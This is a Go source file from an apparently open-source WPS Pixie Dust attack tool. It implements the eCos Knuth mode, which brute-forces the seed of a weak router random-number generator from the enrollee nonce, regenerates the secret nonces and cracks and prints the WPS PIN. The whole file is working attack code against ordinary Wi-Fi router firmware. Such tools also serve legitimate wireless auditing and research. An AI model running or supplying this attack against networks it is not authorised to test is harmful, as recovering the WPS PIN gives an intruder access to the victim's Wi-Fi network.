/*
 * Copyright (C) 2025 Oliver R. Calazans Jeronimo
 *
 * This program is free software: you can redistribute it and/or modify
 * it under the terms of the GNU General Public License as published by
 * the Free Software Foundation, either version 3 of the License, or
 * (at your option) any later version.
 *
 * This program is distributed in the hope that it will be useful,
 * but WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 * GNU General Public License for more details.
 *
 * You should have received a copy of the GNU General Public License
 * along with this program.  If not, see <https://www.gnu.org>.
 */

package pixiedust

import (
	"fmt"
)



func (pda *pixieDustAttack) attackECOSKnuth() {
	if len(pda.eNonce) < wpsNonceLen { return }

    fmt.Printf("[i] Trying eCos Knuth mode (%d)\n", eCosKnuth)
	sc := eCosKnuthSeedCrack{ pda : pda }

	if !sc.findSeed() {
		fmt.Println("Nonce doesn't appear to be generated by this mode, skipping...")
		return
	}

	pda.crackPin()

	if !pda.pinFound() {
		pda.nonceSeed  = 0
		pda.s1Seed     = 0
		pda.s2Seed     = 0
		pda.nonceMatch = eCosKnuth
		return
	}

	pda.displayPIN()
}



type eCosKnuthSeedCrack struct {
	pda   *pixieDustAttack
	seed   uint32
}




func (sc *eCosKnuthSeedCrack) ecosRandKnuth() byte {
    const MM = 2147483647
    const AA = 48271
    const QQ = 44488
    const RR = 3399

    sc.seed = AA * (sc.seed%QQ) - RR * (sc.seed/QQ)

    if (sc.seed & 0x80000000) != 0 {
        sc.seed += MM
    }

    return byte(sc.seed)
}



func (sc *eCosKnuthSeedCrack) findSeed() bool {
	for index := uint32(0); ; index++ {
		sc.seed = index

		if sc.checkECOSSimplestSeed() {
			sc.pda.nonceSeed = index
			sc.generateSecrets()
			
			fmt.Printf("[$] Seed found: %d\n", sc.pda.nonceSeed)	
			return true
		}

		if index == 0xFFFFFFFF { 
			return false 
		}
	}
}



func (sc *eCosKnuthSeedCrack) checkECOSSimplestSeed() bool {
    for i := 0; i < wpsNonceLen; i++ {
        if sc.pda.eNonce[i] != sc.ecosRandKnuth() {
            return false
        }
    }

    return true
}



func (sc *eCosKnuthSeedCrack) generateSecrets() {
	sc.pda.s1Seed = sc.seed
	sc.pda.memAllocESecret1()
	for i := 0; i < wpsSecretNonceLen; i++ {
		sc.pda.eSecret1[i] = sc.ecosRandKnuth()
	}
	
	sc.pda.s2Seed = sc.seed
	sc.pda.memAllocESecret2()
	for i := 0; i < wpsSecretNonceLen; i++ {
	    sc.pda.eSecret2[i] = sc.ecosRandKnuth()
	}
}